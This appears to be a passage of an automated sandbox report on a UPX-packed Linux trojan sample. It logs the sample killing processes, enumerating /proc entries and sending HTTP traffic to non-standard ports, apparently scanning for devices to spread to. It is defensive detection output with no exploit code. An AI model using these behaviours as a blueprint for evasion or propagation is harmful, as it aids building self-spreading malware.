    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1389, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1633, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1809, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1983, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2069, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2102, result: successful
    Source: classification engineClassification label: mal92.spre.troj.evad.lin@0/0@0/0

    Data Obfuscation

    barindex
    Sample is packed with UPX
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1582/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2033/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1612/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1579/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1699/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1335/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1698/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2028/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1334/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1576/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2025/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/910/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/912/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/912/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/759/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/759/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/517/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/918/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/918/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1594/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1349/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1623/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/761/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/761/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1622/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/884/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/884/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1983/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2038/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1344/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1465/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1586/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1860/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1463/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/800/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/800/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/801/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/801/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1629/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1627/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1900/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/491/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/491/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2050/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1877/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/772/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/772/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1633/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1599/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1632/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/774/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/774/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1477/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/654/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/896/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1476/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1872/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2048/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/655/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1475/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/777/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/777/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/656/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/657/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/658/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/658/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/936/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/936/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/419/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1639/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1638/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1809/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1494/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1890/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2063/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2062/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1888/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1886/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/420/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1489/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/785/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/785/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1642/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/667/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/788/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/788/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/789/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/789/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1648/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2078/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2077/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/2074/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/670/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/793/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/793/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1656/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1654/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/674/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/1532/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/675/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/796/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/796/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/676/exe
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/797/fd
    Source: /tmp/VC3SWrkssz (PID: 6241)File opened: /proc/797/exe
    Source: /usr/bin/xfce4-session (PID: 6311)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

    Hooking and other Techniques for Hiding and Protection

    barindex
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42408 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44978 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40066 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37208 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46324 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55300 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44186 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39160 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39672 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48762 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52764 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38934 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 38934
    Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35486 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47446 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54502 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54502 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48506 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54502 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54502 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43554 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56508 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46780 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46780 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46780 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46780 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34182 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56794 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37008 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56128 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34996 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60148 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56996 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51872 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40248 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33638 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51602 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59028 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51778 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55754 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41400 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39870 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39870 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33638 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56878 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39870 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45012 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45012 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45012 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39870 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45012 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58388 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38326 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41020 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33638 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52754 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42202 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40100 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 42202
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47988 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39870 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47988 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52354 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60678 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47988 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52304 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52304 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52304 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33926 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52304 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47988 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44754 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56662 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33638 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48486 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47344 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44670 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43394 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41780 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43394 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43394 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39870 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43394 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47988 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47550 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42126 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39984 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41564 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40466 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51794 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 41564
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 40466
    Source: unknownNetwork traffic detected: HTTP traffic on port 53058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57032 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58390 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43310 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57032 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55214 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 55214
    Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43746 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57032 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59920 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46070 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39002 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59362 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33628 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48008 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57028 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34636 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34636 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34636 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37946 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 55555
